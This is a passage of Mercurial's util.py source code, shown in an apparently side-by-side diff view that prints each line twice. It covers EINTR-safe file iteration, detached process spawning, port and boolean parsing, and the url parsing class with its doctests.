2526 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2527 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2527 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2528 #
2528 #
2529 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2529 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2530 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2530 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2531 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2531 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2532 # fp.__iter__ but not other fp.read* methods.
2532 # fp.__iter__ but not other fp.read* methods.
2533 #
2533 #
2534 # On modern systems like Linux, the "read" syscall cannot be interrupted
2534 # On modern systems like Linux, the "read" syscall cannot be interrupted
2535 # when reading "fast" files like on-disk files. So the EINTR issue only
2535 # when reading "fast" files like on-disk files. So the EINTR issue only
2536 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2536 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2537 # files approximately as "fast" files and use the fast (unsafe) code path,
2537 # files approximately as "fast" files and use the fast (unsafe) code path,
2538 # to minimize the performance impact.
2538 # to minimize the performance impact.
2539 if sys.version_info >= (2, 7, 4):
2539 if sys.version_info >= (2, 7, 4):
2540 # fp.readline deals with EINTR correctly, use it as a workaround.
2540 # fp.readline deals with EINTR correctly, use it as a workaround.
2541 def _safeiterfile(fp):
2541 def _safeiterfile(fp):
2542 return iter(fp.readline, '')
2542 return iter(fp.readline, '')
2543 else:
2543 else:
2544 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2544 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2545 # note: this may block longer than necessary because of bufsize.
2545 # note: this may block longer than necessary because of bufsize.
2546 def _safeiterfile(fp, bufsize=4096):
2546 def _safeiterfile(fp, bufsize=4096):
2547 fd = fp.fileno()
2547 fd = fp.fileno()
2548 line = ''
2548 line = ''
2549 while True:
2549 while True:
2550 try:
2550 try:
2551 buf = os.read(fd, bufsize)
2551 buf = os.read(fd, bufsize)
2552 except OSError as ex:
2552 except OSError as ex:
2553 # os.read only raises EINTR before any data is read
2553 # os.read only raises EINTR before any data is read
2554 if ex.errno == errno.EINTR:
2554 if ex.errno == errno.EINTR:
2555 continue
2555 continue
2556 else:
2556 else:
2557 raise
2557 raise
2558 line += buf
2558 line += buf
2559 if '\n' in buf:
2559 if '\n' in buf:
2560 splitted = line.splitlines(True)
2560 splitted = line.splitlines(True)
2561 line = ''
2561 line = ''
2562 for l in splitted:
2562 for l in splitted:
2563 if l[-1] == '\n':
2563 if l[-1] == '\n':
2564 yield l
2564 yield l
2565 else:
2565 else:
2566 line = l
2566 line = l
2567 if not buf:
2567 if not buf:
2568 break
2568 break
2569 if line:
2569 if line:
2570 yield line
2570 yield line
2571
2571
2572 def iterfile(fp):
2572 def iterfile(fp):
2573 fastpath = True
2573 fastpath = True
2574 if type(fp) is file:
2574 if type(fp) is file:
2575 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2575 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2576 if fastpath:
2576 if fastpath:
2577 return fp
2577 return fp
2578 else:
2578 else:
2579 return _safeiterfile(fp)
2579 return _safeiterfile(fp)
2580 else:
2580 else:
2581 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2581 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2582 def iterfile(fp):
2582 def iterfile(fp):
2583 return fp
2583 return fp
2584
2584
2585 def iterlines(iterator):
2585 def iterlines(iterator):
2586 for chunk in iterator:
2586 for chunk in iterator:
2587 for line in chunk.splitlines():
2587 for line in chunk.splitlines():
2588 yield line
2588 yield line
2589
2589
2590 def expandpath(path):
2590 def expandpath(path):
2591 return os.path.expanduser(os.path.expandvars(path))
2591 return os.path.expanduser(os.path.expandvars(path))
2592
2592
2593 def hgcmd():
2593 def hgcmd():
2594 """Return the command used to execute current hg
2594 """Return the command used to execute current hg
2595
2595
2596 This is different from hgexecutable() because on Windows we want
2596 This is different from hgexecutable() because on Windows we want
2597 to avoid things opening new shell windows like batch files, so we
2597 to avoid things opening new shell windows like batch files, so we
2598 get either the python call or current executable.
2598 get either the python call or current executable.
2599 """
2599 """
2600 if mainfrozen():
2600 if mainfrozen():
2601 if getattr(sys, 'frozen', None) == 'macosx_app':
2601 if getattr(sys, 'frozen', None) == 'macosx_app':
2602 # Env variable set by py2app
2602 # Env variable set by py2app
2603 return [encoding.environ['EXECUTABLEPATH']]
2603 return [encoding.environ['EXECUTABLEPATH']]
2604 else:
2604 else:
2605 return [pycompat.sysexecutable]
2605 return [pycompat.sysexecutable]
2606 return gethgcmd()
2606 return gethgcmd()
2607
2607
2608 def rundetached(args, condfn):
2608 def rundetached(args, condfn):
2609 """Execute the argument list in a detached process.
2609 """Execute the argument list in a detached process.
2610
2610
2611 condfn is a callable which is called repeatedly and should return
2611 condfn is a callable which is called repeatedly and should return
2612 True once the child process is known to have started successfully.
2612 True once the child process is known to have started successfully.
2613 At this point, the child process PID is returned. If the child
2613 At this point, the child process PID is returned. If the child
2614 process fails to start or finishes before condfn() evaluates to
2614 process fails to start or finishes before condfn() evaluates to
2615 True, return -1.
2615 True, return -1.
2616 """
2616 """
2617 # Windows case is easier because the child process is either
2617 # Windows case is easier because the child process is either
2618 # successfully starting and validating the condition or exiting
2618 # successfully starting and validating the condition or exiting
2619 # on failure. We just poll on its PID. On Unix, if the child
2619 # on failure. We just poll on its PID. On Unix, if the child
2620 # process fails to start, it will be left in a zombie state until
2620 # process fails to start, it will be left in a zombie state until
2621 # the parent wait on it, which we cannot do since we expect a long
2621 # the parent wait on it, which we cannot do since we expect a long
2622 # running process on success. Instead we listen for SIGCHLD telling
2622 # running process on success. Instead we listen for SIGCHLD telling
2623 # us our child process terminated.
2623 # us our child process terminated.
2624 terminated = set()
2624 terminated = set()
2625 def handler(signum, frame):
2625 def handler(signum, frame):
2626 terminated.add(os.wait())
2626 terminated.add(os.wait())
2627 prevhandler = None
2627 prevhandler = None
2628 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2628 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2629 if SIGCHLD is not None:
2629 if SIGCHLD is not None:
2630 prevhandler = signal.signal(SIGCHLD, handler)
2630 prevhandler = signal.signal(SIGCHLD, handler)
2631 try:
2631 try:
2632 pid = spawndetached(args)
2632 pid = spawndetached(args)
2633 while not condfn():
2633 while not condfn():
2634 if ((pid in terminated or not testpid(pid))
2634 if ((pid in terminated or not testpid(pid))
2635 and not condfn()):
2635 and not condfn()):
2636 return -1
2636 return -1
2637 time.sleep(0.1)
2637 time.sleep(0.1)
2638 return pid
2638 return pid
2639 finally:
2639 finally:
2640 if prevhandler is not None:
2640 if prevhandler is not None:
2641 signal.signal(signal.SIGCHLD, prevhandler)
2641 signal.signal(signal.SIGCHLD, prevhandler)
2642
2642
2643 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2643 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2644 """Return the result of interpolating items in the mapping into string s.
2644 """Return the result of interpolating items in the mapping into string s.
2645
2645
2646 prefix is a single character string, or a two character string with
2646 prefix is a single character string, or a two character string with
2647 a backslash as the first character if the prefix needs to be escaped in
2647 a backslash as the first character if the prefix needs to be escaped in
2648 a regular expression.
2648 a regular expression.
2649
2649
2650 fn is an optional function that will be applied to the replacement text
2650 fn is an optional function that will be applied to the replacement text
2651 just before replacement.
2651 just before replacement.
2652
2652
2653 escape_prefix is an optional flag that allows using doubled prefix for
2653 escape_prefix is an optional flag that allows using doubled prefix for
2654 its escaping.
2654 its escaping.
2655 """
2655 """
2656 fn = fn or (lambda s: s)
2656 fn = fn or (lambda s: s)
2657 patterns = '|'.join(mapping.keys())
2657 patterns = '|'.join(mapping.keys())
2658 if escape_prefix:
2658 if escape_prefix:
2659 patterns += '|' + prefix
2659 patterns += '|' + prefix
2660 if len(prefix) > 1:
2660 if len(prefix) > 1:
2661 prefix_char = prefix[1:]
2661 prefix_char = prefix[1:]
2662 else:
2662 else:
2663 prefix_char = prefix
2663 prefix_char = prefix
2664 mapping[prefix_char] = prefix_char
2664 mapping[prefix_char] = prefix_char
2665 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2665 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2666 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2666 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2667
2667
2668 def getport(port):
2668 def getport(port):
2669 """Return the port for a given network service.
2669 """Return the port for a given network service.
2670
2670
2671 If port is an integer, it's returned as is. If it's a string, it's
2671 If port is an integer, it's returned as is. If it's a string, it's
2672 looked up using socket.getservbyname(). If there's no matching
2672 looked up using socket.getservbyname(). If there's no matching
2673 service, error.Abort is raised.
2673 service, error.Abort is raised.
2674 """
2674 """
2675 try:
2675 try:
2676 return int(port)
2676 return int(port)
2677 except ValueError:
2677 except ValueError:
2678 pass
2678 pass
2679
2679
2680 try:
2680 try:
2681 return socket.getservbyname(port)
2681 return socket.getservbyname(port)
2682 except socket.error:
2682 except socket.error:
2683 raise Abort(_("no port number associated with service '%s'") % port)
2683 raise Abort(_("no port number associated with service '%s'") % port)
2684
2684
2685 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2685 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2686 '0': False, 'no': False, 'false': False, 'off': False,
2686 '0': False, 'no': False, 'false': False, 'off': False,
2687 'never': False}
2687 'never': False}
2688
2688
2689 def parsebool(s):
2689 def parsebool(s):
2690 """Parse s into a boolean.
2690 """Parse s into a boolean.
2691
2691
2692 If s is not a valid boolean, returns None.
2692 If s is not a valid boolean, returns None.
2693 """
2693 """
2694 return _booleans.get(s.lower(), None)
2694 return _booleans.get(s.lower(), None)
2695
2695
2696 _hextochr = dict((a + b, chr(int(a + b, 16)))
2696 _hextochr = dict((a + b, chr(int(a + b, 16)))
2697 for a in string.hexdigits for b in string.hexdigits)
2697 for a in string.hexdigits for b in string.hexdigits)
2698
2698
2699 class url(object):
2699 class url(object):
2700 r"""Reliable URL parser.
2700 r"""Reliable URL parser.
2701
2701
2702 This parses URLs and provides attributes for the following
2702 This parses URLs and provides attributes for the following
2703 components:
2703 components:
2704
2704
2705 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2705 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2706
2706
2707 Missing components are set to None. The only exception is
2707 Missing components are set to None. The only exception is
2708 fragment, which is set to '' if present but empty.
2708 fragment, which is set to '' if present but empty.
2709
2709
2710 If parsefragment is False, fragment is included in query. If
2710 If parsefragment is False, fragment is included in query. If
2711 parsequery is False, query is included in path. If both are
2711 parsequery is False, query is included in path. If both are
2712 False, both fragment and query are included in path.
2712 False, both fragment and query are included in path.
2713
2713
2714 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2714 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2715
2715
2716 Note that for backward compatibility reasons, bundle URLs do not
2716 Note that for backward compatibility reasons, bundle URLs do not
2717 take host names. That means 'bundle://../' has a path of '../'.
2717 take host names. That means 'bundle://../' has a path of '../'.
2718
2718
2719 Examples:
2719 Examples:
2720
2720
2721 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2721 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2722 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2722 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2723 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2723 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2724 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2724 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2725 >>> url(b'file:///home/joe/repo')
2725 >>> url(b'file:///home/joe/repo')
2726 <url scheme: 'file', path: '/home/joe/repo'>
2726 <url scheme: 'file', path: '/home/joe/repo'>
2727 >>> url(b'file:///c:/temp/foo/')
2727 >>> url(b'file:///c:/temp/foo/')
2728 <url scheme: 'file', path: 'c:/temp/foo/'>
2728 <url scheme: 'file', path: 'c:/temp/foo/'>
2729 >>> url(b'bundle:foo')
2729 >>> url(b'bundle:foo')
2730 <url scheme: 'bundle', path: 'foo'>
2730 <url scheme: 'bundle', path: 'foo'>
2731 >>> url(b'bundle://../foo')
2731 >>> url(b'bundle://../foo')
2732 <url scheme: 'bundle', path: '../foo'>
2732 <url scheme: 'bundle', path: '../foo'>
2733 >>> url(br'c:\foo\bar')
2733 >>> url(br'c:\foo\bar')
2734 <url path: 'c:\\foo\\bar'>
2734 <url path: 'c:\\foo\\bar'>
2735 >>> url(br'\\blah\blah\blah')
2735 >>> url(br'\\blah\blah\blah')
2736 <url path: '\\\\blah\\blah\\blah'>
2736 <url path: '\\\\blah\\blah\\blah'>
2737 >>> url(br'\\blah\blah\blah#baz')
2737 >>> url(br'\\blah\blah\blah#baz')
2738 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2738 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2739 >>> url(br'file:///C:\users\me')
2739 >>> url(br'file:///C:\users\me')
2740 <url scheme: 'file', path: 'C:\\users\\me'>
2740 <url scheme: 'file', path: 'C:\\users\\me'>
2741
2741
2742 Authentication credentials:
2742 Authentication credentials:
2743
2743
2744 >>> url(b'ssh://joe:xyz@x/repo')
2744 >>> url(b'ssh://joe:xyz@x/repo')
2745 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2745 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2746 >>> url(b'ssh://joe@x/repo')
2746 >>> url(b'ssh://joe@x/repo')
2747 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2747 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2748
2748
2749 Query strings and fragments:
2749 Query strings and fragments:
2750
2750
2751 >>> url(b'http://host/a?b#c')
2751 >>> url(b'http://host/a?b#c')
2752 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2752 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2753 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2753 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2754 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2754 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2755
2755
2756 Empty path:
2756 Empty path:
2757
2757
2758 >>> url(b'')
2758 >>> url(b'')
2759 <url path: ''>
2759 <url path: ''>
2760 >>> url(b'#a')
2760 >>> url(b'#a')
2761 <url path: '', fragment: 'a'>
2761 <url path: '', fragment: 'a'>
2762 >>> url(b'http://host/')
2762 >>> url(b'http://host/')
2763 <url scheme: 'http', host: 'host', path: ''>
2763 <url scheme: 'http', host: 'host', path: ''>
2764 >>> url(b'http://host/#a')
2764 >>> url(b'http://host/#a')
2765 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2765 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2766
2766
2767 Only scheme:
2767 Only scheme:
2768
2768
2769 >>> url(b'http:')
2769 >>> url(b'http:')
2770 <url scheme: 'http'>
2770 <url scheme: 'http'>
2771 """
2771 """
2772
2772
2773 _safechars = "!~*'()+"
2773 _safechars = "!~*'()+"
2774 _safepchars = "/!~*'()+:\\"
2774 _safepchars = "/!~*'()+:\\"
2775 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2775 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2776
2776
2777 def __init__(self, path, parsequery=True, parsefragment=True):
2777 def __init__(self, path, parsequery=True, parsefragment=True):
2778 # We slowly chomp away at path until we have only the path left
2778 # We slowly chomp away at path until we have only the path left
2779 self.scheme = self.user = self.passwd = self.host = None
2779 self.scheme = self.user = self.passwd = self.host = None
2780 self.port = self.path = self.query = self.fragment = None
2780 self.port = self.path = self.query = self.fragment = None
2781 self._localpath = True
2781 self._localpath = True
2782 self._hostport = ''
2782 self._hostport = ''
2783 self._origpath = path
2783 self._origpath = path
2784
2784
2785 if parsefragment and '#' in path:
2785 if parsefragment and '#' in path:
2786 path, self.fragment = path.split('#', 1)
2786 path, self.fragment = path.split('#', 1)
2787
2787
2788 # special case for Windows drive letters and UNC paths
2788 # special case for Windows drive letters and UNC paths
2789 if hasdriveletter(path) or path.startswith('\\\\'):
2789 if hasdriveletter(path) or path.startswith('\\\\'):
2790 self.path = path
2790 self.path = path
2791 return
2791 return
2792
2792
2793 # For compatibility reasons, we can't handle bundle paths as
2793 # For compatibility reasons, we can't handle bundle paths as
2794 # normal URLS
2794 # normal URLS
2795 if path.startswith('bundle:'):
2795 if path.startswith('bundle:'):
2796 self.scheme = 'bundle'
2796 self.scheme = 'bundle'
2797 path = path[7:]
2797 path = path[7:]
2798 if path.startswith('//'):
2798 if path.startswith('//'):
2799 path = path[2:]
2799 path = path[2:]
2800 self.path = path
2800 self.path = path
2801 return
2801 return
2802
2802
2803 if self._matchscheme(path):
2803 if self._matchscheme(path):
2804 parts = path.split(':', 1)
2804 parts = path.split(':', 1)
2805 if parts[0]:
2805 if parts[0]:
2806 self.scheme, path = parts
2806 self.scheme, path = parts
2807 self._localpath = False
2807 self._localpath = False
2808
2808
2809 if not path:
2809 if not path:
2810 path = None
2810 path = None
2811 if self._localpath:
2811 if self._localpath:
2812 self.path = ''
2812 self.path = ''
2813 return
2813 return
2814 else:
2814 else:
2815 if self._localpath:
2815 if self._localpath:
2816 self.path = path
2816 self.path = path
2817 return
2817 return
2818
2818
2819 if parsequery and '?' in path:
2819 if parsequery and '?' in path:
2820 path, self.query = path.split('?', 1)
2820 path, self.query = path.split('?', 1)
2821 if not path:
2821 if not path:
2822 path = None
2822 path = None
2823 if not self.query:
2823 if not self.query:
2824 self.query = None
2824 self.query = None
2825
2825
2826 # // is required to specify a host/authority
2826 # // is required to specify a host/authority
2827 if path and path.startswith('//'):
2827 if path and path.startswith('//'):
2828 parts = path[2:].split('/', 1)
2828 parts = path[2:].split('/', 1)
2829 if len(parts) > 1:
2829 if len(parts) > 1:
2830 self.host, path = parts
2830 self.host, path = parts
2831 else:
2831 else:
2832 self.host = parts[0]
2832 self.host = parts[0]
2833 path = None
2833 path = None
2834 if not self.host:
2834 if not self.host:
2835 self.host = None
2835 self.host = None
2836 # path of file:///d is /d
2836 # path of file:///d is /d
2837 # path of file:///d:/ is d:/, not /d:/
2837 # path of file:///d:/ is d:/, not /d:/
2838 if path and not hasdriveletter(path):
2838 if path and not hasdriveletter(path):
2839 path = '/' + path
2839 path = '/' + path
2840
2840
2841 if self.host and '@' in self.host:
2841 if self.host and '@' in self.host:
2842 self.user, self.host = self.host.rsplit('@', 1)
2842 self.user, self.host = self.host.rsplit('@', 1)
2843 if ':' in self.user:
2843 if ':' in self.user:
2844 self.user, self.passwd = self.user.split(':', 1)
2844 self.user, self.passwd = self.user.split(':', 1)
2845 if not self.host:
2845 if not self.host:
2846 self.host = None
2846 self.host = None
2847
2847
2848 # Don't split on colons in IPv6 addresses without ports
2848 # Don't split on colons in IPv6 addresses without ports
2849 if (self.host and ':' in self.host and
2849 if (self.host and ':' in self.host and
2850 not (self.host.startswith('[') and self.host.endswith(']'))):
2850 not (self.host.startswith('[') and self.host.endswith(']'))):
2851 self._hostport = self.host
2851 self._hostport = self.host
2852 self.host, self.port = self.host.rsplit(':', 1)
2852 self.host, self.port = self.host.rsplit(':', 1)
2853 if not self.host:
2853 if not self.host:
2854 self.host = None
2854 self.host = None
2855
2855
2856 if (self.host and self.scheme == 'file' and
2856 if (self.host and self.scheme == 'file' and
2857 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2857 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2858 raise Abort(_('file:// URLs can only refer to localhost'))
2858 raise Abort(_('file:// URLs can only refer to localhost'))
2859
2859
2860 self.path = path
2860 self.path = path
2861
2861
2862 # leave the query string escaped
2862 # leave the query string escaped
2863 for a in ('user', 'passwd', 'host', 'port',
2863 for a in ('user', 'passwd', 'host', 'port',
2864 'path', 'fragment'):
2864 'path', 'fragment'):
2865 v = getattr(self, a)
2865 v = getattr(self, a)
2866 if v is not None:
2866 if v is not None:
2867 setattr(self, a, urlreq.unquote(v))
2867 setattr(self, a, urlreq.unquote(v))
2868
2868
2869 @encoding.strmethod
2869 @encoding.strmethod
2870 def __repr__(self):
2870 def __repr__(self):
2871 attrs = []
2871 attrs = []
2872 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2872 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2873 'query', 'fragment'):
2873 'query', 'fragment'):
2874 v = getattr(self, a)
2874 v = getattr(self, a)
2875 if v is not None:
2875 if v is not None:
2876 attrs.append('%s: %r' % (a, v))
2876 attrs.append('%s: %r' % (a, v))
2877 return '<url %s>' % ', '.join(attrs)
2877 return '<url %s>' % ', '.join(attrs)
2878
2878
2879 def __bytes__(self):
2879 def __bytes__(self):
2880 r"""Join the URL's components back into a URL string.
2880 r"""Join the URL's components back into a URL string.
2881
2881
2882 Examples:
2882 Examples:
2883
2883
2884 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2884 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2885 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2885 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2886 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2886 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2887 'http://user:pw@host:80/?foo=bar&baz=42'
2887 'http://user:pw@host:80/?foo=bar&baz=42'
2888 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2888 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2889 'http://user:pw@host:80/?foo=bar%3dbaz'
2889 'http://user:pw@host:80/?foo=bar%3dbaz'
2890 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2890 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2891 'ssh://user:pw@[::1]:2200//home/joe#'
2891 'ssh://user:pw@[::1]:2200//home/joe#'
2892 >>> bytes(url(b'http://localhost:80//'))
2892 >>> bytes(url(b'http://localhost:80//'))
2893 'http://localhost:80//'
2893 'http://localhost:80//'
2894 >>> bytes(url(b'http://localhost:80/'))
2894 >>> bytes(url(b'http://localhost:80/'))
2895 'http://localhost:80/'
2895 'http://localhost:80/'
2896 >>> bytes(url(b'http://localhost:80'))
2896 >>> bytes(url(b'http://localhost:80'))
2897 'http://localhost:80/'
2897 'http://localhost:80/'
2898 >>> bytes(url(b'bundle:foo'))
2898 >>> bytes(url(b'bundle:foo'))
2899 'bundle:foo'
2899 'bundle:foo'
2900 >>> bytes(url(b'bundle://../foo'))
2900 >>> bytes(url(b'bundle://../foo'))
2901 'bundle:../foo'
2901 'bundle:../foo'
2902 >>> bytes(url(b'path'))
2902 >>> bytes(url(b'path'))
2903 'path'
2903 'path'
2904 >>> bytes(url(b'file:///tmp/foo/bar'))
2904 >>> bytes(url(b'file:///tmp/foo/bar'))
2905 'file:///tmp/foo/bar'
2905 'file:///tmp/foo/bar'
2906 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2906 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2907 'file:///c:/tmp/foo/bar'
2907 'file:///c:/tmp/foo/bar'
2908 >>> print(url(br'bundle:foo\bar'))
2908 >>> print(url(br'bundle:foo\bar'))
2909 bundle:foo\bar
2909 bundle:foo\bar
2910 >>> print(url(br'file:///D:\data\hg'))
2910 >>> print(url(br'file:///D:\data\hg'))
2911 file:///D:\data\hg
2911 file:///D:\data\hg
2912 """
2912 """
2913 if self._localpath:
2913 if self._localpath:
2914 s = self.path
2914 s = self.path
2915 if self.scheme == 'bundle':
2915 if self.scheme == 'bundle':
2916 s = 'bundle:' + s
2916 s = 'bundle:' + s
2917 if self.fragment:
2917 if self.fragment:
2918 s += '#' + self.fragment
2918 s += '#' + self.fragment
2919 return s
2919 return s
2920
2920
2921 s = self.scheme + ':'
2921 s = self.scheme + ':'
2922 if self.user or self.passwd or self.host:
2922 if self.user or self.passwd or self.host:
2923 s += '//'
2923 s += '//'
2924 elif self.scheme and (not self.path or self.path.startswith('/')
2924 elif self.scheme and (not self.path or self.path.startswith('/')
2925 or hasdriveletter(self.path)):
2925 or hasdriveletter(self.path)):
2926 s += '//'
2926 s += '//'
2927 if hasdriveletter(self.path):
2927 if hasdriveletter(self.path):
2928 s += '/'
2928 s += '/'
2929 if self.user:
2929 if self.user:
2930 s += urlreq.quote(self.user, safe=self._safechars)
2930 s += urlreq.quote(self.user, safe=self._safechars)
2931 if self.passwd:
2931 if self.passwd:
2932 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2932 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2933 if self.user or self.passwd:
2933 if self.user or self.passwd:
2934 s += '@'
2934 s += '@'
2935 if self.host:
2935 if self.host:
2936 if not (self.host.startswith('[') and self.host.endswith(']')):
2936 if not (self.host.startswith('[') and self.host.endswith(']')):
2937 s += urlreq.quote(self.host)
2937 s += urlreq.quote(self.host)
2938 else:
2938 else:
2939 s += self.host
2939 s += self.host
2940 if self.port:
2940 if self.port:
2941 s += ':' + urlreq.quote(self.port)
2941 s += ':' + urlreq.quote(self.port)
2942 if self.host:
2942 if self.host:
2943 s += '/'
2943 s += '/'
2944 if self.path:
2944 if self.path:
2945 # TODO: similar to the query string, we should not unescape the
2945 # TODO: similar to the query string, we should not unescape the
2946 # path when we store it, the path might contain '%2f' = '/',
2946 # path when we store it, the path might contain '%2f' = '/',
2947 # which we should *not* escape.
2947 # which we should *not* escape.
2948 s += urlreq.quote(self.path, safe=self._safepchars)
2948 s += urlreq.quote(self.path, safe=self._safepchars)
2949 if self.query:
2949 if self.query:
2950 # we store the query in escaped form.
2950 # we store the query in escaped form.
2951 s += '?' + self.query
2951 s += '?' + self.query
2952 if self.fragment is not None:
2952 if self.fragment is not None:
2953 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2953 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2954 return s
2954 return s
2955
2955
2956 __str__ = encoding.strmethod(__bytes__)
2956 __str__ = encoding.strmethod(__bytes__)
2957
2957
2958 def authinfo(self):
2958 def authinfo(self):
2959 user, passwd = self.user, self.passwd
2959 user, passwd = self.user, self.passwd
2960 try:
2960 try:
2961 self.user, self.passwd = None, None
2961 self.user, self.passwd = None, None
2962 s = bytes(self)
2962 s = bytes(self)
2963 finally:
2963 finally:
2964 self.user, self.passwd = user, passwd
2964 self.user, self.passwd = user, passwd
2965 if not self.user:
2965 if not self.user:
2966 return (s, None)
2966 return (s, None)
2967 # authinfo[1] is passed to urllib2 password manager, and its
2967 # authinfo[1] is passed to urllib2 password manager, and its
2968 # URIs must not contain credentials. The host is passed in the
2968 # URIs must not contain credentials. The host is passed in the
2969 # URIs list because Python < 2.4.3 uses only that to search for
2969 # URIs list because Python < 2.4.3 uses only that to search for
2970 # a password.
2970 # a password.
2971 return (s, (None, (s, self.host),
2971 return (s, (None, (s, self.host),
2972 self.user, self.passwd or ''))
2972 self.user, self.passwd or ''))
2973
2973
2974 def isabs(self):
2974 def isabs(self):
2975 if self.scheme and self.scheme != 'file':
2975 if self.scheme and self.scheme != 'file':
2976 return True # remote URL
2976 return True # remote URL
2977 if hasdriveletter(self.path):
2977 if hasdriveletter(self.path):
2978 return True # absolute for our purposes - can't be joined()
2978 return True # absolute for our purposes - can't be joined()
2979 if self.path.startswith(br'\\'):
2979 if self.path.startswith(br'\\'):
2980 return True # Windows UNC path
2980 return True # Windows UNC path
2981 if self.path.startswith('/'):
2981 if self.path.startswith('/'):
2982 return True # POSIX-style
2982 return True # POSIX-style
2983 return False
2983 return False
2984
2984
2985 def localpath(self):
2985 def localpath(self):
2986 if self.scheme == 'file' or self.scheme == 'bundle':
2986 if self.scheme == 'file' or self.scheme == 'bundle':
2987 path = self.path or '/'
2987 path = self.path or '/'
2988 # For Windows, we need to promote hosts containing drive
2988 # For Windows, we need to promote hosts containing drive
2989 # letters to paths with drive letters.
2989 # letters to paths with drive letters.
2990 if hasdriveletter(self._hostport):
2990 if hasdriveletter(self._hostport):
2991 path = self._hostport + '/' + self.path
2991 path = self._hostport + '/' + self.path
2992 elif (self.host is not None and self.path
2992 elif (self.host is not None and self.path
2993 and not hasdriveletter(path)):
2993 and not hasdriveletter(path)):
2994 path = '/' + path
2994 path = '/' + path
2995 return path
2995 return path
2996 return self._origpath
2996 return self._origpath
2997
2997
2998 def islocal(self):
2998 def islocal(self):
2999 '''whether localpath will return something that posixfile can open'''
2999 '''whether localpath will return something that posixfile can open'''
3000 return (not self.scheme or self.scheme == 'file'
3000 return (not self.scheme or self.scheme == 'file'
3001 or self.scheme == 'bundle')
3001 or self.scheme == 'bundle')
3002
3002
3003 def hasscheme(path):
3003 def hasscheme(path):
3004 return bool(url(path).scheme)
3004 return bool(url(path).scheme)
3005
3005
3006 def hasdriveletter(path):
3006 def hasdriveletter(path):
3007 return path and path[1:2] == ':' and path[0:1].isalpha()
3007 return path and path[1:2] == ':' and path[0:1].isalpha()
3008
3008
3009 def urllocalpath(path):
